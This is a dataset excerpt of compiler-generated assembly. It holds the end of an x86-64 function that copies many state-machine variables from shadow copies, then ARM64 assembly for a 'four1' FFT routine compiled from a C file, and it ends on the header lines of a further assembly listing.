LBB1_682: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_685
## %bb.683: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $21, (%rax)
jne LBB1_685
## %bb.684: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -13(%rbp) ## 1-byte Spill
je LBB1_692
LBB1_685: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_semaphore@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
movb $1, %al
cmpl $-1, %ecx
movb %al, -14(%rbp) ## 1-byte Spill
je LBB1_691
## %bb.686: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -15(%rbp) ## 1-byte Spill
jne LBB1_690
## %bb.687: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $21, (%rcx)
movb %al, -16(%rbp) ## 1-byte Spill
jne LBB1_689
## %bb.688: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
movb %al, -16(%rbp) ## 1-byte Spill
LBB1_689: ## in Loop: Header=BB1_70 Depth=1
movb -16(%rbp), %al ## 1-byte Reload
movb %al, -15(%rbp) ## 1-byte Spill
LBB1_690: ## in Loop: Header=BB1_70 Depth=1
movb -15(%rbp), %al ## 1-byte Reload
xorb $-1, %al
movb %al, -14(%rbp) ## 1-byte Spill
LBB1_691: ## in Loop: Header=BB1_70 Depth=1
movb -14(%rbp), %al ## 1-byte Reload
movb %al, -13(%rbp) ## 1-byte Spill
LBB1_692: ## in Loop: Header=BB1_70 Depth=1
movb -13(%rbp), %al ## 1-byte Reload
movb %al, -12(%rbp) ## 1-byte Spill
LBB1_693: ## in Loop: Header=BB1_70 Depth=1
movb -12(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movl %eax, -8(%rbp)
movq __x_sm21_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm21_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm21_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm21_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm20_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm20_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm20_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm20_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm19_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm19_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm19_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm19_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm7_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm7_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm6_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm6_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm8_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm8_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm4_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm4_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm3_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm3_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm6_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm6_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm7_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm7_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm5_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm5_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_run@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _run@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm2_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm2_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm0_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm0_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm0_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm0_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm8_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm8_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm1_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm1_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm2_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm2_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm3_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm3_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm0_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm0_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm1_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm1_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm1_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm1_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm5_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm5_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm4_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm4_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm2_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm2_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm9_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm9_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm9_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm9_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm3_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm3_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm10_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm10_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm18_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm18_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm11_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm11_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm10_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm10_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm4_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm4_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm11_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm11_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm19_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm19_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm12_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm12_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm11_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm11_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm5_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm5_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm12_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm12_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm20_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm20_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm13_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm13_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm12_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm12_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm6_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm6_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm13_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm13_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm21_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm21_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm14_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm14_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm13_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm13_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm7_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm7_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm14_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm14_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm15_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm15_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm14_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm14_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm8_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm8_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm15_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm15_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm16_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm16_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm15_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm15_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm9_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm9_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm16_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm16_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm17_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm17_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_semaphore@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _semaphore@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm16_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm16_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm10_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm10_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm17_state@GOTPCREL(%rip), %rax
movb (%rax), %cl
movq _sm17_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
movq __x_sm18_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm18_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm17_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm17_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_sm18_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq _sm18_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
jmp LBB1_70
LBB1_694:
movl -4(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.comm _sm21_l,4,2 ## @sm21_l
.comm _sm21_loop_len,4,2 ## @sm21_loop_len
.comm _sm20_l,4,2 ## @sm20_l
.comm _sm20_loop_len,4,2 ## @sm20_loop_len
.comm _sm19_l,4,2 ## @sm19_l
.comm _sm19_loop_len,4,2 ## @sm19_loop_len
.comm _sm7_state,1,0 ## @sm7_state
.comm _sm6_state,1,0 ## @sm6_state
.comm _sm8_l,4,2 ## @sm8_l
.comm _sm4_state,1,0 ## @sm4_state
.comm _sm3_state,1,0 ## @sm3_state
.comm _sm6_l,4,2 ## @sm6_l
.comm _sm7_l,4,2 ## @sm7_l
.comm _sm5_state,1,0 ## @sm5_state
.comm _run,4,2 ## @run
.comm _sm2_l,4,2 ## @sm2_l
.comm _sm0_loop_len,4,2 ## @sm0_loop_len
.comm _sm0_l,4,2 ## @sm0_l
.comm _sm8_state,1,0 ## @sm8_state
.comm _sm1_loop_len,4,2 ## @sm1_loop_len
.comm _sm2_state,1,0 ## @sm2_state
.comm _sm3_l,4,2 ## @sm3_l
.comm _sm0_state,1,0 ## @sm0_state
.comm _sm1_state,1,0 ## @sm1_state
.comm _sm1_l,4,2 ## @sm1_l
.comm _sm5_l,4,2 ## @sm5_l
.comm _sm4_l,4,2 ## @sm4_l
.comm _sm2_loop_len,4,2 ## @sm2_loop_len
.comm _sm9_state,1,0 ## @sm9_state
.comm _sm9_l,4,2 ## @sm9_l
.comm _sm3_loop_len,4,2 ## @sm3_loop_len
.comm _sm10_state,1,0 ## @sm10_state
.comm _sm18_state,1,0 ## @sm18_state
.comm _sm11_loop_len,4,2 ## @sm11_loop_len
.comm _sm10_l,4,2 ## @sm10_l
.comm _sm4_loop_len,4,2 ## @sm4_loop_len
.comm _sm11_state,1,0 ## @sm11_state
.comm _sm19_state,1,0 ## @sm19_state
.comm _sm12_loop_len,4,2 ## @sm12_loop_len
.comm _sm11_l,4,2 ## @sm11_l
.comm _sm5_loop_len,4,2 ## @sm5_loop_len
.comm _sm12_state,1,0 ## @sm12_state
.comm _sm20_state,1,0 ## @sm20_state
.comm _sm13_loop_len,4,2 ## @sm13_loop_len
.comm _sm12_l,4,2 ## @sm12_l
.comm _sm6_loop_len,4,2 ## @sm6_loop_len
.comm _sm13_state,1,0 ## @sm13_state
.comm _sm21_state,1,0 ## @sm21_state
.comm _sm14_loop_len,4,2 ## @sm14_loop_len
.comm _sm13_l,4,2 ## @sm13_l
.comm _sm7_loop_len,4,2 ## @sm7_loop_len
.comm _sm14_state,1,0 ## @sm14_state
.comm _sm15_loop_len,4,2 ## @sm15_loop_len
.comm _sm14_l,4,2 ## @sm14_l
.comm _sm8_loop_len,4,2 ## @sm8_loop_len
.comm _sm15_state,1,0 ## @sm15_state
.comm _sm16_loop_len,4,2 ## @sm16_loop_len
.comm _sm15_l,4,2 ## @sm15_l
.comm _sm9_loop_len,4,2 ## @sm9_loop_len
.comm _sm16_state,1,0 ## @sm16_state
.comm _sm17_loop_len,4,2 ## @sm17_loop_len
.comm _semaphore,4,2 ## @semaphore
.comm _sm16_l,4,2 ## @sm16_l
.comm _sm10_loop_len,4,2 ## @sm10_loop_len
.comm _sm17_state,1,0 ## @sm17_state
.comm _sm18_loop_len,4,2 ## @sm18_loop_len
.comm _sm17_l,4,2 ## @sm17_l
.comm _sm18_l,4,2 ## @sm18_l
.comm __x_sm21_l,4,2 ## @_x_sm21_l
.comm __x_sm21_loop_len,4,2 ## @_x_sm21_loop_len
.comm __x_sm20_l,4,2 ## @_x_sm20_l
.comm __x_sm20_loop_len,4,2 ## @_x_sm20_loop_len
.comm __x_sm19_l,4,2 ## @_x_sm19_l
.comm __x_sm19_loop_len,4,2 ## @_x_sm19_loop_len
.comm __x_sm7_state,1,0 ## @_x_sm7_state
.comm __x_sm6_state,1,0 ## @_x_sm6_state
.comm __x_sm8_l,4,2 ## @_x_sm8_l
.comm __x_sm4_state,1,0 ## @_x_sm4_state
.comm __x_sm3_state,1,0 ## @_x_sm3_state
.comm __x_sm6_l,4,2 ## @_x_sm6_l
.comm __x_sm7_l,4,2 ## @_x_sm7_l
.comm __x_sm5_state,1,0 ## @_x_sm5_state
.comm __x_run,4,2 ## @_x_run
.comm __x_sm2_l,4,2 ## @_x_sm2_l
.comm __x_sm0_loop_len,4,2 ## @_x_sm0_loop_len
.comm __x_sm0_l,4,2 ## @_x_sm0_l
.comm __x_sm8_state,1,0 ## @_x_sm8_state
.comm __x_sm1_loop_len,4,2 ## @_x_sm1_loop_len
.comm __x_sm2_state,1,0 ## @_x_sm2_state
.comm __x_sm3_l,4,2 ## @_x_sm3_l
.comm __x_sm0_state,1,0 ## @_x_sm0_state
.comm __x_sm1_state,1,0 ## @_x_sm1_state
.comm __x_sm1_l,4,2 ## @_x_sm1_l
.comm __x_sm5_l,4,2 ## @_x_sm5_l
.comm __x_sm4_l,4,2 ## @_x_sm4_l
.comm __x_sm2_loop_len,4,2 ## @_x_sm2_loop_len
.comm __x_sm9_state,1,0 ## @_x_sm9_state
.comm __x_sm9_l,4,2 ## @_x_sm9_l
.comm __x_sm3_loop_len,4,2 ## @_x_sm3_loop_len
.comm __x_sm10_state,1,0 ## @_x_sm10_state
.comm __x_sm18_state,1,0 ## @_x_sm18_state
.comm __x_sm11_loop_len,4,2 ## @_x_sm11_loop_len
.comm __x_sm10_l,4,2 ## @_x_sm10_l
.comm __x_sm4_loop_len,4,2 ## @_x_sm4_loop_len
.comm __x_sm11_state,1,0 ## @_x_sm11_state
.comm __x_sm19_state,1,0 ## @_x_sm19_state
.comm __x_sm12_loop_len,4,2 ## @_x_sm12_loop_len
.comm __x_sm11_l,4,2 ## @_x_sm11_l
.comm __x_sm5_loop_len,4,2 ## @_x_sm5_loop_len
.comm __x_sm12_state,1,0 ## @_x_sm12_state
.comm __x_sm20_state,1,0 ## @_x_sm20_state
.comm __x_sm13_loop_len,4,2 ## @_x_sm13_loop_len
.comm __x_sm12_l,4,2 ## @_x_sm12_l
.comm __x_sm6_loop_len,4,2 ## @_x_sm6_loop_len
.comm __x_sm13_state,1,0 ## @_x_sm13_state
.comm __x_sm21_state,1,0 ## @_x_sm21_state
.comm __x_sm14_loop_len,4,2 ## @_x_sm14_loop_len
.comm __x_sm13_l,4,2 ## @_x_sm13_l
.comm __x_sm7_loop_len,4,2 ## @_x_sm7_loop_len
.comm __x_sm14_state,1,0 ## @_x_sm14_state
.comm __x_sm15_loop_len,4,2 ## @_x_sm15_loop_len
.comm __x_sm14_l,4,2 ## @_x_sm14_l
.comm __x_sm8_loop_len,4,2 ## @_x_sm8_loop_len
.comm __x_sm15_state,1,0 ## @_x_sm15_state
.comm __x_sm16_loop_len,4,2 ## @_x_sm16_loop_len
.comm __x_sm15_l,4,2 ## @_x_sm15_l
.comm __x_sm9_loop_len,4,2 ## @_x_sm9_loop_len
.comm __x_sm16_state,1,0 ## @_x_sm16_state
.comm __x_sm17_loop_len,4,2 ## @_x_sm17_loop_len
.comm __x_semaphore,4,2 ## @_x_semaphore
.comm __x_sm16_l,4,2 ## @_x_sm16_l
.comm __x_sm10_loop_len,4,2 ## @_x_sm10_loop_len
.comm __x_sm17_state,1,0 ## @_x_sm17_state
.comm __x_sm18_loop_len,4,2 ## @_x_sm18_loop_len
.comm __x_sm17_l,4,2 ## @_x_sm17_l
.comm __x_sm18_l,4,2 ## @_x_sm18_l
.subsections_via_symbols
| the_stack_data/237644040.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function four1
lCPI0_0:
.quad 0x401921fb54442d1c ; double 6.2831853071795898
.section __TEXT,__text,regular,pure_instructions
.globl _four1
.p2align 2
_four1: ; @four1
.cfi_startproc
; %bb.0:
sub sp, sp, #128
.cfi_def_cfa_offset 128
stp x29, x30, [sp, #112] ; 16-byte Folded Spill
add x29, sp, #112
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
stur w2, [x29, #-16]
ldur w8, [x29, #-12]
lsl w8, w8, #1
stur w8, [x29, #-20]
mov w8, #1
stur w8, [x29, #-32]
stur w8, [x29, #-40]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_5 Depth 2
ldur w8, [x29, #-40]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_11
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-32]
ldur w9, [x29, #-40]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-8]
ldursw x9, [x29, #-32]
ldr s0, [x8, x9, lsl #2]
str s0, [sp, #20]
ldur x8, [x29, #-8]
ldursw x9, [x29, #-40]
ldr s0, [x8, x9, lsl #2]
ldur x8, [x29, #-8]
ldursw x9, [x29, #-32]
str s0, [x8, x9, lsl #2]
ldr s0, [sp, #20]
ldur x8, [x29, #-8]
ldursw x9, [x29, #-40]
str s0, [x8, x9, lsl #2]
ldur x8, [x29, #-8]
ldur w9, [x29, #-32]
add w9, w9, #1
ldr s0, [x8, w9, sxtw #2]
str s0, [sp, #20]
ldur x8, [x29, #-8]
ldur w9, [x29, #-40]
add w9, w9, #1
ldr s0, [x8, w9, sxtw #2]
ldur x8, [x29, #-8]
ldur w9, [x29, #-32]
add w9, w9, #1
str s0, [x8, w9, sxtw #2]
ldr s0, [sp, #20]
ldur x8, [x29, #-8]
ldur w9, [x29, #-40]
add w9, w9, #1
str s0, [x8, w9, sxtw #2]
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-20]
asr w8, w8, #1
stur w8, [x29, #-28]
b LBB0_5
LBB0_5: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-28]
subs w8, w8, #2
cset w8, lt
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=2
ldur w8, [x29, #-32]
ldur w9, [x29, #-28]
subs w8, w8, w9
cset w8, gt
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #12] ; 4-byte Folded Reload
tbz w8, #0, LBB0_9
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_5 Depth=2
ldur w9, [x29, #-28]
ldur w8, [x29, #-32]
subs w8, w8, w9
stur w8, [x29, #-32]
ldur w8, [x29, #-28]
asr w8, w8, #1
stur w8, [x29, #-28]
b LBB0_5
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
ldur w9, [x29, #-28]
ldur w8, [x29, #-32]
add w8, w8, w9
stur w8, [x29, #-32]
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-40]
add w8, w8, #2
stur w8, [x29, #-40]
b LBB0_1
LBB0_11:
mov w8, #2
stur w8, [x29, #-24]
b LBB0_12
LBB0_12: ; =>This Loop Header: Depth=1
; Child Loop BB0_14 Depth 2
; Child Loop BB0_16 Depth 3
ldur w8, [x29, #-20]
ldur w9, [x29, #-24]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB0_22
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_12 Depth=1
ldur w9, [x29, #-24]
mov w8, #2
mul w8, w8, w9
stur w8, [x29, #-36]
ldur w8, [x29, #-16]
ldur w9, [x29, #-24]
mul w8, w8, w9
scvtf d1, w8
adrp x8, lCPI0_0@PAGE
ldr d0, [x8, lCPI0_0@PAGEOFF]
fdiv d0, d0, d1
str d0, [sp, #24]
ldr d1, [sp, #24]
fmov d0, #0.50000000
fmul d0, d0, d1
bl _sin
stur d0, [x29, #-48]
ldur d1, [x29, #-48]
fmov d0, #-2.00000000
fmul d0, d0, d1
ldur d1, [x29, #-48]
fmul d0, d0, d1
str d0, [sp, #48]
ldr d0, [sp, #24]
bl _sin
str d0, [sp, #40]
fmov d0, #1.00000000
str d0, [sp, #56]
movi d0, #0000000000000000
str d0, [sp, #32]
mov w8, #1
stur w8, [x29, #-28]
b LBB0_14
LBB0_14: ; Parent Loop BB0_12 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_16 Depth 3
ldur w8, [x29, #-28]
ldur w9, [x29, #-24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_21
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_14 Depth=2
ldur w8, [x29, #-28]
stur w8, [x29, #-40]
b LBB0_16
LBB0_16: ; Parent Loop BB0_12 Depth=1
; Parent Loop BB0_14 Depth=2
; => This Inner Loop Header: Depth=3
ldur w8, [x29, #-40]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_19
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_16 Depth=3
ldur w8, [x29, #-40]
ldur w9, [x29, #-24]
add w8, w8, w9
stur w8, [x29, #-32]
ldr d0, [sp, #56]
ldur x8, [x29, #-8]
ldursw x9, [x29, #-32]
ldr s1, [x8, x9, lsl #2]
fcvt d1, s1
ldr d2, [sp, #32]
ldur x8, [x29, #-8]
ldur w9, [x29, #-32]
add w9, w9, #1
ldr s3, [x8, w9, sxtw #2]
fcvt d3, s3
fmul d2, d2, d3
fnmsub d0, d0, d1, d2
fcvt s0, d0
str s0, [sp, #20]
ldr d0, [sp, #56]
ldur x8, [x29, #-8]
ldur w9, [x29, #-32]
add w9, w9, #1
ldr s1, [x8, w9, sxtw #2]
fcvt d1, s1
ldr d2, [sp, #32]
ldur x8, [x29, #-8]
ldursw x9, [x29, #-32]
ldr s3, [x8, x9, lsl #2]
fcvt d3, s3
fmul d2, d2, d3
fmadd d0, d0, d1, d2
fcvt s0, d0
str s0, [sp, #16]
ldur x8, [x29, #-8]
ldursw x9, [x29, #-40]
ldr s0, [x8, x9, lsl #2]
ldr s1, [sp, #20]
fsub s0, s0, s1
ldur x8, [x29, #-8]
ldursw x9, [x29, #-32]
str s0, [x8, x9, lsl #2]
ldur x8, [x29, #-8]
ldur w9, [x29, #-40]
add w9, w9, #1
ldr s0, [x8, w9, sxtw #2]
ldr s1, [sp, #16]
fsub s0, s0, s1
ldur x8, [x29, #-8]
ldur w9, [x29, #-32]
add w9, w9, #1
str s0, [x8, w9, sxtw #2]
ldr s1, [sp, #20]
ldur x8, [x29, #-8]
ldursw x9, [x29, #-40]
add x8, x8, x9, lsl #2
ldr s0, [x8]
fadd s0, s0, s1
str s0, [x8]
ldr s1, [sp, #16]
ldur x8, [x29, #-8]
ldur w9, [x29, #-40]
add w9, w9, #1
add x8, x8, w9, sxtw #2
ldr s0, [x8]
fadd s0, s0, s1
str s0, [x8]
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_16 Depth=3
ldur w9, [x29, #-36]
ldur w8, [x29, #-40]
add w8, w8, w9
stur w8, [x29, #-40]
b LBB0_16
LBB0_19: ; in Loop: Header=BB0_14 Depth=2
ldr d0, [sp, #56]
stur d0, [x29, #-48]
ldr d1, [sp, #48]
ldr d2, [sp, #32]
ldr d3, [sp, #40]
fmul d2, d2, d3
fnmsub d0, d0, d1, d2
ldr d1, [sp, #56]
fadd d0, d0, d1
str d0, [sp, #56]
ldr d0, [sp, #32]
ldr d1, [sp, #48]
ldur d2, [x29, #-48]
ldr d3, [sp, #40]
fmul d2, d2, d3
fmadd d0, d0, d1, d2
ldr d1, [sp, #32]
fadd d0, d0, d1
str d0, [sp, #32]
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_14 Depth=2
ldur w8, [x29, #-28]
add w8, w8, #2
stur w8, [x29, #-28]
b LBB0_14
LBB0_21: ; in Loop: Header=BB0_12 Depth=1
ldur w8, [x29, #-36]
stur w8, [x29, #-24]
b LBB0_12
LBB0_22:
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
